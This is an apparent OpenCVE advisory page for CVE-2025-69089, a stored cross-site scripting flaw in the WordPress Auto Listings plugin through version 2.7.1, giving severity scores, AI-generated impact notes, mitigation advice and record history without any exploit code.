Description
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in autolistings Auto Listings auto-listings allows Stored XSS.This issue affects Auto Listings: from n/a through <= 2.7.1.
Published: 2025-12-30
Score: 6.5 Medium
EPSS: < 1% Very Low
KEV: No
Impact: n/a
Action: n/a
AI Analysis

Impact

The vulnerability is an improper neutralization of input during web page generation, allowing stored cross‑site scripting in the WordPress Auto Listings plugin in all releases up to 2.7.1. An attacker can inject malicious JavaScript that will run in the browsers of users who view affected listings, potentially leading to data theft, session hijacking, defacement, or other client‑side impacts. The weakness is a classic input‑validation flaw, formally identified as CWE‑79.

Affected Systems

Affected systems are installations of the WordPress Auto Listings plugin with version 2.7.1 or earlier. The issue applies to any site that uses the plugin to accept, store, or display listing data without proper sanitization, regardless of plugin configuration or WordPress host.

Risk and Exploitability

The CVSS base score is 6.5, indicating moderate severity. The EPSS score is less than 1%, showing a very low probability of exploitation at this time, and the vulnerability is not listed in the CISA KEV catalog. The likely attack vector is via the plugin’s data entry interface; an attacker who can submit or edit listing content will trigger the stored XSS. No additional privileges beyond the ability to add or modify listing data are required, as inferred from the description that the flaw exists in stored data.

Generated by OpenCVE AI on April 29, 2026 at 12:05 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Apply the latest Auto Listings plugin update that addresses the stored XSS flaw.
  • If an update is not immediately available, restrict or disable the form fields that accept user‑supplied data, or enforce stricter sanitization before storage to prevent script injection.
  • Implement a Content Security Policy that disallows inline scripts and limits script sources to trusted origins, mitigating the impact of any residual XSS payloads.

Generated by OpenCVE AI on April 29, 2026 at 12:05 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 20 Jan 2026 15:30:00 +0000

Type Values Removed Values Added
References

Tue, 20 Jan 2026 14:45:00 +0000

Type Values Removed Values Added
References

Mon, 05 Jan 2026 14:15:00 +0000

Type Values Removed Values Added
Metrics cvssV3_1

{'score': 6.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L'}

ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'none', 'Technical Impact': 'partial'}, 'version': '2.0.3'}

Mon, 05 Jan 2026 12:30:00 +0000

Type Values Removed Values Added
First Time appeared Wordpress
Wordpress wordpress
Wpautolistings
Wpautolistings auto Listings
Vendors & Products Wordpress
Wordpress wordpress
Wpautolistings
Wpautolistings auto Listings

Tue, 30 Dec 2025 11:00:00 +0000

Type Values Removed Values Added
Description Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in autolistings Auto Listings auto-listings allows Stored XSS.This issue affects Auto Listings: from n/a through <= 2.7.1.
Title WordPress Auto Listings plugin <= 2.7.1 - Cross Site Scripting (XSS) vulnerability
Weaknesses CWE-79
References

Subscriptions

Wordpress Wordpress
Wpautolistings Auto Listings
cve-icon MITRE

Status: PUBLISHED

Assigner: Patchstack

Published:

Updated: 2026-04-28T20:41:47.920Z

Reserved: 2025-12-29T11:19:16.970Z

Link: CVE-2025-69089

cve-icon Vulnrichment

Updated: 2026-01-05T13:29:44.424Z

cve-icon NVD

Status : Deferred

Published: 2025-12-30T11:16:02.317

Modified: 2026-04-15T00:35:42.020

Link: CVE-2025-69089

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-29T12:15:09Z

Weaknesses